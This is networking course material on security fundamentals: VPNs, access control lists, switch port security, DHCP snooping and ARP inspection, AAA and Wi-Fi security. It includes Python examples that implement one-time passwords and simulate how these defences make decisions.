• Microsoft Active Directory is accessed via LDAP
• LDAP common attributes: Common Name (CN), Domain Component (DC), Organizational Unit (OU)
Password Alternatives
Certificates
• A digital certificate provides a user (or device) with credentials to prove its identity, and binds that identity to a public key
• Must contain a serial number, issuer, subject (owner) and the subject's public key
• A signed data structure (usually stored as text-encoded PEM) that ties a user account to a public/private key pair. The certificate carries only the public key; the private key stays with the subject, and the certificate is signed by a certificate server or certificate authority (CA)
• Verisign defined digital certificate classes:
  • Class 1: intended for email
  • Class 2: provides proof of identity
  • Class 3: servers and software signing, for which independent verification of identity and authority is done by the issuing CA
X.509 certificate fields
• Version
• Serial Number
• Algorithm ID
• Issuer
• Validity
• Subject
• Subject Public Key Info
  • Public Key Algorithm
  • Subject Public Key
• Issuer Unique Identifier (optional)
• Subject Unique Identifier (optional)
• Extensions (optional)
Password Alternatives
Multifactor Authentication
• Adds an additional level of security to the authentication process by verifying more than one characteristic
• Users can be identified in the following ways:
  • By something they know (password)
  • By something they are (retina, fingerprint)
  • By something they possess (smart card, token)
  • By somewhere they are (location)
  • By something they do (behavior)
• Two-factor authentication happens when two of the above categories are tested (two passwords are still a single factor)
Biometrics
• Use physical characteristics to identify users
• Systems include hand scanners, retinal scanners, etc.
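The one-time password mentioned under Lesson 3 and the "something they possess" factor above, as an added example (not from the deck): HOTP (RFC 4226) and TOTP (RFC 6238) built from the standard library, plus the server-side check that makes a code genuinely one-time by refusing replays within the acceptance window. The secret is the 20-byte RFC 4226 test key, so the expected codes (755224 for counter 0; 94287082 at Unix time 59 with 8 digits) are the published vectors; the Authenticator class and its skew window are this example's own design.

```python
import hashlib
import hmac
import struct
import time

RFC4226_SECRET = b"12345678901234567890"  # published test key; never reuse it


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226: HMAC-SHA1 over the 8-byte big-endian counter, dynamic
    truncation to a 31-bit integer, then the low `digits` decimal digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at=None, step: int = 30, digits: int = 6) -> str:
    """RFC 6238: HOTP with counter = floor(unix_time / step)."""
    now = time.time() if at is None else at
    return hotp(secret, int(now // step), digits)


def verify_totp(secret, code, at=None, step=30, window=1):
    """Accept the current time step and +/- `window` neighbours to tolerate
    clock skew. Returns the matched counter, or None."""
    now = time.time() if at is None else at
    centre = int(now // step)
    for counter in range(centre - window, centre + window + 1):
        if hmac.compare_digest(hotp(secret, counter), code):
            return counter
    return None


class Authenticator:
    """Server-side second factor with replay protection: a counter is
    accepted at most once, and never after a later one has been used."""

    def __init__(self, secret):
        self.secret = secret
        self.last_counter = -1

    def check(self, code, at=None):
        counter = verify_totp(self.secret, code, at)
        if counter is None or counter <= self.last_counter:
            return False
        self.last_counter = counter
        return True


if __name__ == "__main__":
    print("HOTP counter 0:", hotp(RFC4226_SECRET, 0))
    print("TOTP at t=59  :", totp(RFC4226_SECRET, at=59, digits=8))
    auth = Authenticator(RFC4226_SECRET)
    code = totp(RFC4226_SECRET, at=1000)
    print("first use :", auth.check(code, at=1000))
    print("replayed  :", auth.check(code, at=1005))
```

Without the last_counter check a code phished a few seconds earlier would still be accepted inside the skew window, which is exactly the replay the "one-time" property is meant to rule out.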
Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists

• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,


local passwords authorization, and accounting concepts

• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Module 5: Security Fundamentals
Lesson 5: Describe remote access and site-to-site VPNs

• Describe remote access and site-to-site VPNs
Remote Access Overview
• Use case is for when you are not physically next to the servers
  • Remote workers, remote offices
• A Virtual Private Network (VPN) allows a worker or remote office to establish a secure connection over the Internet (an untrusted network)
VPN Protocols
• Point-to-Point Tunneling Protocol (PPTP) – encrypts Point-to-Point Protocol (PPP) traffic. Uses Generic Routing Encapsulation (GRE) to transport and Microsoft Point-to-Point Encryption (MPPE) to encrypt. Uses TCP port 1723 (control) and IP protocol 47 (GRE, data). Older protocol; its MS-CHAPv2 authentication and RC4-based MPPE are broken, so it should not be used for new deployments
• Layer 2 Tunneling Protocol (L2TP) – newer than PPTP. Has no encryption of its own and is combined with IPsec (L2TP/IPsec) for confidentiality. Uses UDP port 500 (IKE key exchange), UDP port 4500 (IPsec NAT traversal) and UDP port 1701 (L2TP)
• Secure Socket Tunneling Protocol (SSTP) – Microsoft's TLS-based VPN, common on Windows clients. Tunnels PPP over SSL/TLS on TCP port 443, so it passes firewalls the same way HTTPS does
Additional Security Protocols
• Generic Routing Encapsulation (GRE) – designed to create a point-to-point tunnel between two devices. Establishes the tunnel and then encapsulates other types of traffic, such as IPv4 packets, inside GRE packets. Commonly used to set up a tunnel between routers. GRE itself provides no encryption, so it is paired with IPsec (GRE over IPsec) when confidentiality is needed
• IPsec (Internet Protocol Security) – encrypts IP traffic that matches the policy configured on the device. Uses Encapsulating Security Payload (ESP) to encrypt (and optionally authenticate) traffic, Authentication Header (AH) for integrity and authentication without encryption, and Internet Key Exchange (IKE) to negotiate and exchange keys
• Internet Security Association and Key Management Protocol (ISAKMP) – the framework for setting up a secure channel (security association) and exchanging keys. IKE implements ISAKMP: the peers authenticate each other first, then derive the keys used to protect traffic
Remote Access VPNs
• VPN client software is installed on the laptop to connect over the Internet to a VPN server (concentrator) at the main site
• Protects company data while it crosses the Internet
• One of the protocols mentioned (L2TP/IPsec, SSTP, or the legacy PPTP) is used to encrypt data from the laptop across the Internet to the main site
• For example, a user could run Cisco AnyConnect and establish a VPN connection over SSL/TLS (AnyConnect can also use IPsec/IKEv2)
Site-to-Site VPNs
• A VPN appliance, such as a router, is installed at each location; the two appliances create an encrypted tunnel between them
• Users do not have to install software on their laptops: their traffic flows over the local network normally until it reaches the router, where it is encrypted and sent to the other side of the VPN
• Commonly used to connect branch offices to the main office
Module 5: Security Fundamentals
• Lesson 1: Define key security concepts • Lesson 6: Configure and verify access control lists

• Lesson 2: Describe security program elements • Lesson 7: Configure Layer 2 security features

• Lesson 3: Configure device access control using • Lesson 8: Differentiate authentication,


local passwords authorization, and accounting concepts

• Lesson 4: Describe security password policies • Lesson 9: Describe wireless security protocols
elements
• Lesson 10: Configure WLAN using WPA2 PSK using
• Lesson 5: Describe remote access and site-to- the GUI
site VPNs
Module 5: Security Fundamentals
Lesson 6: Configure and verify access control lists

• Configure and verify access control lists
Access Lists
• Access Control Lists (ACLs) provide control of network traffic
• Used to filter out unwanted traffic based on security policies
• Can be set up to only allow certain hosts or networks access to a certain resource
• ACLs are packet filters: packets are compared against them, categorized, and acted upon accordingly
• Can be applied to inbound or outbound traffic on an interface
• The packet is always compared with each line of the ACL in sequential order, starting with line 1
• The packet is compared with lines of the ACL only until a match is made; then the action of that line is taken and later lines are never consulted
• "Implicit deny" at the end of every ACL: if a packet does not match any line, it is dropped
Standard Access Lists
• Use only the source IP address of the packet as the condition test. All decisions are made based on the source IP address
Extended Access Lists
• Much more detailed
• Evaluate source and destination IP addresses, the protocol field in the network-layer header, and the ports in the transport-layer header
Named Access Lists
• Can be standard or extended
• Use a name for the ACL instead of a number
Applying Access Lists
• Once the ACL lines are written, the ACL needs to be referenced on an interface, such as a Layer 3 interface on a router
• This is the point where traffic is compared against the ACL lines; an ACL that is not applied anywhere filters nothing
• Only one ACL per interface, per protocol, per direction
• If a new entry is added to an ACL it is placed at the bottom of the list, unless a sequence number is given
• With the classic numbered access-list syntax you cannot remove just one line: removing a line removes the whole ACL. If a line needs to be removed, copy the entire ACL to a text editor, remove the line, and then re-apply the entire ACL. Named ACLs (ip access-list) allow individual entries to be deleted by sequence number
• ACLs applied to interfaces filter traffic that goes through the router, not traffic generated by the router itself
Inbound Access Lists
• The ACL is applied to packets arriving on an interface; those packets are checked against the ACL before being routed to the outbound interface
Outbound Access Lists
• The ACL is applied to packets leaving an interface; those packets are routed to the outbound interface first and then checked against the ACL before being queued
Standard Access Lists
• Filters traffic based on the source IP address in the packet
• Standard ACLs use the following number ranges:
• 1 – 99
• 1300 – 1999
• The router knows what type of ACL is being created from the number that is used
• Syntax: access-list <number> {permit | deny} {<source> <wildcard> | host <address> | any}
Wildcard Masks
• Used to specify a network, a range or a specific host in ACL entries
• Wildcard masks work bit by bit: a 0 bit means that bit of the address must match, a 1 bit means "don't care"
• To specify a single host: 10.0.0.52 0.0.0.0 (an octet of 0 must match exactly; the keyword host does the same thing)
• To specify a /8 network: 10.0.0.0 0.255.255.255
• To specify a /24 network: 10.0.0.0 0.0.0.255
• An octet of 255 in the wildcard matches any value; values in between (such as the 1 in 0.0.1.255) match a block of addresses
• To match a subnet with a wildcard mask, invert the subnet mask: subtract each octet of the subnet mask from 255 and the result is the wildcard mask (255.255.255.0 becomes 0.0.0.255, 255.255.254.0 becomes 0.0.1.255)
Wildcard Mask Examples
IP Address    Wildcard Mask     Matches
0.0.0.0       255.255.255.255   Any address (same as keyword 'any')
172.16.1.1    0.0.0.0           Only 172.16.1.1 (same as 'host 172.16.1.1')
172.16.1.0    0.0.0.255         172.16.1.0 – 172.16.1.255 (172.16.1.0/24)
172.16.2.0    0.0.1.255         172.16.2.0 – 172.16.3.255 (172.16.2.0/23)
172.16.0.0    0.0.255.255       172.16.0.0 – 172.16.255.255 (172.16.0.0/16)
Standard Access List Example
• Goal: deny the 10.0.0.0 network access to the 10.1.0.0 network, while still allowing everything else to reach that network
• The ACL is a deny entry for sources in the 10.0.0.0 network followed by a permit for any other source; without that permit, the implicit deny would block all other traffic too
• By applying the ACL outbound on s0/3/0 (the interface toward the 10.1.0.0 network), any outbound packet with a source IP in the 10.0.0.0 network is dropped
• Because the ACL is applied on that one interface only, the 10.0.0.0 network can still reach other areas
Controlling VTY Access
• Standard ACLs can be used on the VTY lines to limit Telnet and SSH access to the device itself
• No protocol needs to be specified, since the VTY lines only carry the Telnet/SSH management sessions (prefer SSH; Telnet sends the login credentials in cleartext)
• Create a standard ACL that permits only the hosts that should be able to manage the router
• Apply the ACL to the VTY lines with the 'access-class' command in the 'in' direction, as it applies to incoming sessions
• Only hosts in the 10.0.0.0/24 network will be able to Telnet/SSH into the router; all others are rejected by the implicit deny, before a login prompt is ever shown
Extended Access Control Lists
• A standard ACL expanded
• Can specify source and destination addresses
• Can specify the protocol (ip, tcp, udp, icmp, ...) and port numbers
• Extended ACL number ranges:
• 100 – 199
• 2000 – 2699
• Overall a more granular approach to ACLs
• With an extended ACL number the CLI exposes all the additional options
• The example entry on the slide denies FTP from any IP to the 10.1.0.51 host; any other traffic should be permitted
• To permit that other traffic the ACL also needs the following line, because of the implicit deny on every ACL:
• access-list 123 permit ip any any
• The keyword 'log' can be added at the end of an entry to log a message (with the matched source and destination) every time that entry is hit; logging costs CPU on every match, so put it on the specific deny entries you want visibility into rather than on the permit ip any any
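The wildcard-mask rules and table above, the standard ACL applied outbound toward the 10.1.0.0 network, the VTY access-class and extended ACL 123 can all be exercised with the following added example. It is not code from the course; it models the IOS matching semantics (top-down, first match wins, implicit deny) in Python. The names Entry, Packet, evaluate() and the sample ACLs are assumptions constructed for the example.

```python
"""Added example, not from the course slides: a model of how a Cisco-style IPv4
access list evaluates a packet. Matching semantics follow IOS (top-down, first
match wins, implicit deny at the end); the class and function names and the
sample ACLs are constructed for this example."""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional


def wildcard_from_mask(subnet_mask: str) -> str:
    """Invert a subnet mask octet by octet: 255 - octet (255.255.254.0 -> 0.0.1.255)."""
    return ".".join(str(255 - int(o)) for o in subnet_mask.split("."))


def wildcard_match(address: str, wildcard: str, candidate: str) -> bool:
    """True when every bit that is 0 in the wildcard is identical in address and candidate."""
    a = int(ipaddress.IPv4Address(address))
    w = int(ipaddress.IPv4Address(wildcard))
    c = int(ipaddress.IPv4Address(candidate))
    care = 0xFFFFFFFF ^ w  # bits that must match exactly (1 bits in the wildcard are don't-care)
    return (a & care) == (c & care)


@dataclass
class Entry:
    action: str                        # "permit" or "deny"
    src: str                           # source address + wildcard (the only test a standard ACL has)
    src_wc: str
    protocol: str = "ip"               # extended ACLs: "tcp", "udp", "icmp"...; "ip" matches any protocol
    dst: str = "0.0.0.0"               # destination address + wildcard (extended ACLs only)
    dst_wc: str = "255.255.255.255"
    dst_port: Optional[int] = None     # "eq <port>" on the destination (extended ACLs only)
    log: bool = False                  # the 'log' keyword


@dataclass
class Packet:
    src: str
    dst: str
    protocol: str = "ip"
    dst_port: Optional[int] = None


def evaluate(acl: List[Entry], pkt: Packet, log_lines: Optional[List[str]] = None) -> str:
    """Compare the packet with each entry in order and act on the first match.
    A packet that matches nothing hits the implicit deny at the end of every ACL."""
    for line, e in enumerate(acl, start=1):
        if not wildcard_match(e.src, e.src_wc, pkt.src):
            continue
        if not wildcard_match(e.dst, e.dst_wc, pkt.dst):
            continue
        if e.protocol != "ip" and e.protocol != pkt.protocol:
            continue
        if e.dst_port is not None and e.dst_port != pkt.dst_port:
            continue
        if e.log and log_lines is not None:  # what the 'log' keyword would emit to syslog
            log_lines.append(f"list line {line} {e.action} {pkt.protocol} {pkt.src} -> {pkt.dst}")
        return e.action
    return "deny"  # implicit deny


ANY = ("0.0.0.0", "255.255.255.255")   # the keyword 'any'

# Standard ACL from the slide: deny sources in 10.0.0.0/8, permit everything else
# (applied outbound on the interface toward the 10.1.0.0 network).
STANDARD_ACL = [
    Entry("deny", "10.0.0.0", "0.255.255.255"),
    Entry("permit", *ANY),
]

# Extended ACL 123 from the slide: deny FTP control (tcp/21) from any host to 10.1.0.51,
# then 'permit ip any any' so the implicit deny does not block everything else.
EXTENDED_ACL_123 = [
    Entry("deny", *ANY, "tcp", "10.1.0.51", "0.0.0.0", 21, log=True),
    Entry("permit", *ANY),
]

# VTY access-class: permit only 10.0.0.0/24. There is deliberately no 'permit any',
# so every other management source falls through to the implicit deny.
VTY_ACL = [Entry("permit", "10.0.0.0", wildcard_from_mask("255.255.255.0"))]


if __name__ == "__main__":
    logged: List[str] = []
    print(evaluate(STANDARD_ACL, Packet("10.5.6.7", "10.1.0.9")))                       # deny
    print(evaluate(EXTENDED_ACL_123, Packet("203.0.113.5", "10.1.0.51", "tcp", 21), logged))  # deny
    print(evaluate(EXTENDED_ACL_123[:1], Packet("203.0.113.5", "10.1.0.51", "tcp", 80)))  # deny (implicit)
    print(logged)
```

Feed evaluate() the same HTTP packet against EXTENDED_ACL_123 with and without the second entry: it is permitted only once permit ip any any is present, which is exactly the implicit-deny surprise the slide warns about. wildcard_from_mask() performs the 255-minus-octet inversion from the Wildcard Masks slide.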
Named Access Control Lists
• Can be used for standard or extended ACLs
• Use a name instead of a number to identify the ACL
• Configured with 'ip access-list {standard | extended} <name>' instead of 'access-list'; this enters a sub-mode in which each entry is a permit or deny line, and entries carry sequence numbers so a single line can be deleted or inserted without rebuilding the list
Remarks
• Provide the ability to add comments to the ACL
• A good remark can be very valuable and save hours of troubleshooting for someone who is seeing the ACL for the first time
• Place a remark as the first line of the ACL (and ideally ahead of each non-obvious entry) so it explains what the list is for
Monitoring Access Control Lists
• show access-lists – displays all access lists configured on the router (IP and other protocols) with their entries and a per-entry match counter
• show access-lists 123 – shows only the entries of that specific ACL
• show ip access-lists – shows only the IP ACLs configured on the router
• show ip interface – displays, per interface, which inbound and outbound ACLs are applied
• show running-config – shows the ACL definitions together with the interfaces and VTY lines they are applied to
• The match counters are the quickest check that an ACL is actually doing something: a deny entry whose counter stays at zero while the traffic keeps flowing usually means the ACL is applied on the wrong interface or in the wrong direction
Module 5: Security Fundamentals
Lesson 7: Configure layer 2 security features

• DHCP snooping
• Dynamic ARP inspection
• Port security
Layer 2 Security Overview
The access layer is where we generally find Layer 2 networking, and it is also where end-user devices connect to the network. Putting security mechanisms here is critical for protecting users, applications and the network from attacks, because many Layer 2 attacks (rogue DHCP servers, ARP poisoning, MAC flooding) start from a device plugged into an access port.
Disable unused ports
• Shut down any switchports that are not currently in use. This prevents an unauthorized person from connecting to an active switchport
• Use the shutdown command on the interface; moving unused ports into an unused "parking" VLAN as well limits the damage if one is brought up by mistake
Port security
• Ability to lock down a switchport to a specific MAC address, or to a maximum number of MAC addresses, seen on the interface
• Prevents unauthorized devices from gaining access to the LAN through that port and blunts MAC-flooding attacks on the switch's address table
• Only works on ports statically configured as access ports (or, on newer platforms, static trunks); it cannot be enabled on a port in dynamic (DTP-negotiated) mode, which is why the first configuration step is to set the port mode explicitly
Port security configuration
• switchport mode access
• Ensures the switchport is in access mode (port security is rejected on a dynamic port)
• switchport port-security
• Enables port security on the interface
• switchport port-security maximum <number>
• Maximum number of MAC addresses that may be associated with the interface (default 1)
• switchport port-security violation {protect | restrict | shutdown}
• protect – frames from unknown MAC addresses are silently dropped; authorized devices keep working, but there is no log message and no violation counter, so you will not notice the attempt
• restrict – frames from unknown MAC addresses are dropped, the violation counter is incremented and a syslog message / SNMP trap is generated; authorized devices keep working
• shutdown – the port is placed in err-disabled state as soon as an unauthorized device connects, so all traffic stops, including the authorized device's; this is the default, and the port must be re-enabled by an administrator (shutdown, then no shutdown) or by errdisable recovery
• switchport port-security mac-address aaaa.aaaa.aaaa
• Statically specifies the MAC address of the device that is authorized on the switchport
• Using the keyword sticky instead of a MAC address makes the switch learn the address currently seen on the port and write it into the running configuration as if it had been entered statically; save the configuration, otherwise the sticky entries are lost on reload
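To see how the three violation modes differ on the same sequence of frames, here is an added example (not from the course) that models a port-security switchport in Python. The SecurePort class, its fields, the MAC addresses and the syslog strings are constructed for the example.

```python
"""Added example, not from the course slides: a model of a port-security enabled
switchport so the protect / restrict / shutdown violation modes can be compared
side by side. The class and method names are hypothetical and the syslog text is
constructed; a real switch enforces this in hardware."""
from dataclasses import dataclass, field
from typing import Dict, List, Set


@dataclass
class SecurePort:
    maximum: int = 1                 # switchport port-security maximum <n>
    violation: str = "shutdown"      # switchport port-security violation {protect|restrict|shutdown}
    sticky: bool = False             # switchport port-security mac-address sticky
    static: Set[str] = field(default_factory=set)    # switchport port-security mac-address <mac>
    learned: Set[str] = field(default_factory=set)   # dynamically (or sticky) learned addresses
    err_disabled: bool = False
    violation_count: int = 0
    syslog: List[str] = field(default_factory=list)
    sticky_config: List[str] = field(default_factory=list)  # lines sticky adds to the running-config

    def receive(self, src_mac: str) -> str:
        """Apply port security to one ingress frame: returns 'forward', 'drop' or 'err-disabled'."""
        mac = src_mac.lower()
        if self.err_disabled:
            return "err-disabled"    # port is down for everyone until an admin recovers it
        if mac in self.static or mac in self.learned:
            return "forward"         # known secure address
        if len(self.static) + len(self.learned) < self.maximum:
            self.learned.add(mac)    # room left in the secure-address table: learn it
            if self.sticky:
                self.sticky_config.append(f"switchport port-security mac-address sticky {mac}")
            return "forward"
        # Unknown MAC and the secure-address table is full: a violation
        if self.violation == "protect":
            return "drop"            # silently dropped: no counter, no syslog
        self.violation_count += 1
        if self.violation == "restrict":
            self.syslog.append(f"PSECURE_VIOLATION: address {mac} on secure port (constructed message)")
            return "drop"            # dropped but logged; authorized devices keep working
        self.err_disabled = True     # shutdown mode: the whole port goes err-disabled
        self.syslog.append(f"ERR_DISABLE: psecure-violation caused by {mac} (constructed message)")
        return "err-disabled"

    def no_shutdown(self) -> None:
        """Administrator recovery (shutdown / no shutdown) clears the err-disabled state."""
        self.err_disabled = False


def compare_modes(frames: List[str]) -> Dict[str, List[str]]:
    """Run the same frame sequence through each violation mode and report what happens."""
    results: Dict[str, List[str]] = {}
    for mode in ("protect", "restrict", "shutdown"):
        port = SecurePort(maximum=1, violation=mode)
        results[mode] = [port.receive(mac) for mac in frames]
    return results


if __name__ == "__main__":
    # constructed traffic: the authorized PC, then an attacker's device, then the PC again
    for mode, outcome in compare_modes(["aaaa.aaaa.aaaa", "bbbb.bbbb.bbbb", "aaaa.aaaa.aaaa"]).items():
        print(f"{mode:9s} {outcome}")
```

The third frame is the point: in protect and restrict mode the authorized device keeps working after the violation, while in shutdown mode it is cut off along with the attacker until someone clears the err-disabled port. Protect mode also leaves no trace, which is why restrict is usually the better choice when availability matters.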
DHCP Snooping configuration
Prevents rogue DHCP servers from handing out bad IP addresses. A rogue server can also hand out an attacker-controlled DNS server and default gateway, which gives the attacker the ability to have all of the victim's traffic flow through their own system (man-in-the-middle).
Each switchport is classified as trusted or untrusted. DHCP server messages (OFFER, ACK, NAK) are accepted only on trusted ports, so the port leading to the legitimate DHCP server (or the uplink toward it) must be trusted, while access ports stay untrusted. The switch also records every lease it sees in a binding table (MAC address, IP address, VLAN, interface).
• ip dhcp snooping
• ip dhcp snooping vlan 1
• Global commands that enable DHCP snooping and then enable it for VLAN 1. Run these two LAST: once snooping is on, every port is untrusted by default and DHCP stops working until the server/uplink port has been trusted
• interface f0/24
• ip dhcp snooping trust
• Marks the port as trusted so DHCP server replies are accepted on it (connect the DHCP server, or the uplink toward it, to this port)
• show ip dhcp snooping binding
• Shows the binding table: the MAC address, IP address, lease time, VLAN and interface of each untrusted host that obtained an address through the switch; this table is what Dynamic ARP Inspection checks against
• One common surprise: with snooping enabled the switch inserts the DHCP relay-information option (option 82) into client requests by default, and some DHCP servers or relays drop requests that carry it; if clients stop getting leases right after enabling snooping, check that first
Dynamic ARP Inspection
Address Resolution Protocol (ARP) is used to learn the MAC address that is associated with an IP address. A broadcast ARP request asks for the MAC address of a specific IP address; only the device with that IP address should respond with its MAC address, and the asking device then stores the IP-to-MAC pair in its ARP cache.
ARP has no authentication, so attackers can manipulate ARP caches to their advantage (ARP poisoning). An attacker sends ARP replies that map their own MAC address to the IP address of the default gateway; the victims then send their traffic through the attacker's system (man-in-the-middle).
Cisco switches offer Dynamic ARP Inspection (DAI) to counter this:
• Intercepts all ARP messages arriving on untrusted ports and compares the sender IP/MAC pair with the DHCP snooping binding database, so DHCP snooping must be enabled first; hosts with static addresses need a matching entry in an ARP ACL instead
• If the information does not match, the ARP packet is dropped and logged
• Like DHCP snooping, DAI is enabled per VLAN, and the uplinks toward other switches are marked trusted so that legitimate ARP traffic from the rest of the network is not inspected
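An added example (not part of the course material) that models DHCP snooping and DAI together, because DAI's decisions depend entirely on the binding table that snooping builds. The port names, MAC and IP addresses, the message tuples and the SnoopingSwitch class are constructed for the example.

```python
"""Added example, not from the course slides: a model of one VLAN on a switch
running DHCP snooping and Dynamic ARP Inspection. It shows how the binding table
is built from DHCP exchanges, why server replies from untrusted ports are
dropped, and how DAI uses the binding table to drop spoofed ARP replies.
Names, addresses and message formats are constructed for the example."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

SERVER_MESSAGES = {"OFFER", "ACK", "NAK"}                  # only a DHCP server sends these
CLIENT_MESSAGES = {"DISCOVER", "REQUEST", "RELEASE", "DECLINE"}


@dataclass
class SnoopingSwitch:
    trusted: Set[str] = field(default_factory=set)           # ip dhcp snooping trust / ip arp inspection trust
    pending: Dict[str, str] = field(default_factory=dict)    # client MAC -> port that sent DISCOVER/REQUEST
    bindings: Dict[str, Tuple[str, str]] = field(default_factory=dict)  # client MAC -> (IP, port)
    dropped: List[str] = field(default_factory=list)

    def dhcp(self, port: str, msg: str, client_mac: str, ip: Optional[str] = None) -> bool:
        """Process one DHCP message seen on 'port'. Returns True if the switch forwards it."""
        if msg in SERVER_MESSAGES:
            if port not in self.trusted:
                self.dropped.append(f"DHCP {msg} from untrusted {port}: rogue server")
                return False
            if msg == "ACK" and client_mac in self.pending:
                # Lease confirmed: record which MAC holds which IP behind which access port
                self.bindings[client_mac] = (ip, self.pending.pop(client_mac))
            return True
        if msg in ("DISCOVER", "REQUEST"):
            self.pending[client_mac] = port
            return True
        if msg in ("RELEASE", "DECLINE"):
            # An untrusted host may only release or decline its own lease, from its own port
            bound = self.bindings.get(client_mac)
            if port not in self.trusted and (bound is None or bound[1] != port):
                self.dropped.append(f"DHCP {msg} for {client_mac} from {port} does not match binding")
                return False
            self.bindings.pop(client_mac, None)
            return True
        self.dropped.append(f"unknown DHCP message {msg}")
        return False

    def arp(self, port: str, sender_mac: str, sender_ip: str) -> bool:
        """DAI: an ARP packet from an untrusted port is forwarded only if its sender IP/MAC
        pair matches a DHCP snooping binding learned on that same port."""
        if port in self.trusted:
            return True
        bound = self.bindings.get(sender_mac)
        if bound is None or bound != (sender_ip, port):
            self.dropped.append(f"ARP {sender_ip} is-at {sender_mac} on {port}: no matching binding")
            return False
        return True

    def show_binding(self) -> List[str]:
        """Rows in the spirit of 'show ip dhcp snooping binding': MAC, IP, interface."""
        return [f"{mac}  {ip}  {port}" for mac, (ip, port) in sorted(self.bindings.items())]


def scenario() -> SnoopingSwitch:
    """Constructed traffic: a legitimate lease on f0/1 via the trusted server port f0/24,
    then a rogue server and an ARP-poisoning attempt from the attacker on f0/7."""
    sw = SnoopingSwitch(trusted={"f0/24"})
    sw.dhcp("f0/1", "DISCOVER", "aaaa.aaaa.aaaa")
    sw.dhcp("f0/24", "OFFER", "aaaa.aaaa.aaaa", "10.0.0.50")
    sw.dhcp("f0/1", "REQUEST", "aaaa.aaaa.aaaa")
    sw.dhcp("f0/24", "ACK", "aaaa.aaaa.aaaa", "10.0.0.50")
    sw.dhcp("f0/7", "OFFER", "aaaa.aaaa.aaaa", "10.0.0.99")   # rogue server: dropped
    sw.arp("f0/1", "aaaa.aaaa.aaaa", "10.0.0.50")             # honest client: forwarded
    sw.arp("f0/7", "bbbb.bbbb.bbbb", "10.0.0.1")              # attacker claims the gateway: dropped
    return sw


if __name__ == "__main__":
    sw = scenario()
    print("\n".join(sw.show_binding()))
    print("\n".join(sw.dropped))
```

The binding table is keyed on what the switch saw, not on what hosts claim: the attacker's ARP reply for 10.0.0.1 fails because no lease for that MAC/IP exists on f0/7, and even replaying the honest client's real MAC/IP pair from f0/7 fails because the binding points at f0/1.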
Module 5: Security Fundamentals
Lesson 8: Differentiate authentication, authorization, and
accounting concepts

• Authentication
• Authorization
• Accounting
AAA Services
Authentication
• Validates the credentials of the user (or device) as they attempt to sign in: it establishes who they are
• Uses a database of identities and secrets, such as usernames and password hashes, certificates or one-time tokens
Authentication methods
• Local authentication
• Accounts are created directly on each system (for example username/secret entries in a router's configuration)
• No centralized system: every device holds its own copy of the accounts, which does not scale and makes revocation slow
• Useful as a fallback if the centralized authentication server is unreachable
• 802.1X
• Three roles: Supplicant (the client) – Authenticator (the switch or access point) – Authentication Server
• Controls access to the internal network at the port level and can be used for wired and wireless connections; until authentication succeeds the port carries only the authentication traffic
• Uses a RADIUS server as the authentication server; the RADIUS server can in turn look users up in a directory such as LDAP or Active Directory (TACACS+ is used for device administration, not for 802.1X)
• Extensible Authentication Protocol (EAP)
• A framework for carrying the authentication exchange (passwords, certificates, tokens) between supplicant and authentication server
• Not a specific authentication method but a container for many EAP methods
• Cisco's LEAP (Lightweight EAP) was an early wireless method; it is broken (its MS-CHAP exchange can be cracked offline) and should not be used
• Microsoft's PEAP (Protected EAP) wraps the inner user authentication in a TLS tunnel and is widely used with user credentials; EAP-TLS uses client certificates and is the strongest common choice
AAA Services
Authorization
• Once authenticated, the user is granted access to network resources
• Based on the account and its privileges, authorization determines how much access is granted (which commands, privilege level, VLAN or resources)
• To control traffic, ACLs can be used
• Rules configured on Cisco routers that permit or deny certain types of traffic; a RADIUS server can also push a per-user ACL or VLAN to the switch as part of the authorization result
• Network Access Control (NAC) – provides the ability to authorize who can gain access to wired/wireless networks based on the state of the connecting device, which is known as a posture assessment
• Connect to wireless – accept terms (captive portal) before access is given
• Patching levels – antivirus installed and up to date, operating system patch level current
• Switch connection – with 802.1X, the device is authenticated by a system such as a RADIUS server before access is given
• Port security – control of switchports based on MAC address (a weak form of authorization on its own, since MAC addresses are easily spoofed)

AAA Services
Accounting
• Logging what users do when they access a resource: who, what, when and from where
• Used for auditing and incident investigation; on network devices it typically records logins and every command executed
• Examples could include:
• File access – log each time a user accesses (or deletes) certain files on a server
• Database access – log when a user reads certain data in a database or changes fields
• TACACS+
• Terminal Access Controller Access Control System Plus
• Developed by Cisco; the protocol is documented in RFC 8907 and is implemented by several vendors
• Used for administrative access to network routers and switches (device administration AAA): it separates authentication, authorization and accounting, supports per-command authorization, runs over TCP port 49 and obfuscates the entire packet body (weakly, so RFC 8907 recommends carrying it over a protected management network)
• It has not been replaced by RADIUS: TACACS+ remains the usual choice for device administration, RADIUS for network access

• RADIUS
• Remote Authentication Dial-In User Service, also known as the 'AAA server'
• Used for network access today: remote-access VPN, wireless and 802.1X
• Works client-server: the server makes the AAA decisions; the client is a wireless AP or controller, a VPN concentrator or an 802.1X switch that relays the user's credentials
• Uses UDP (ports 1812/1813, or the legacy 1645/1646), combines authentication and authorization in one exchange, and protects only the password attribute with the shared secret rather than the whole packet; the client/server shared secret must therefore be strong and RADIUS traffic kept on a protected network
• A user logs on and is authenticated, tries to access a resource and is authorized, and that access is accounted for (logged)
Module 5: Security Fundamentals
Lesson 9: Describe wireless security protocols

• WPA
• WPA2
• WPA3
WiFi Protected Access (WPA)
• The Wi-Fi Alliance's interim replacement for WEP (WEP used a static pre-shared key with RC4 and is trivially cracked)
• Encryption – per-packet key mixing with the Temporal Key Integrity Protocol (TKIP), still built on RC4; TKIP is deprecated and should not be enabled today
• Authentication – 802.1X user authentication with EAP, or a pre-shared key
Personal vs Enterprise (applies to WPA, WPA2 and WPA3)
• Personal – WPA2/WPA3 using a pre-shared key (PSK) that everyone on the WLAN shares
• Enterprise – WPA2/WPA3 using 802.1X with an authentication server (RADIUS) for per-user credentials
WPA2
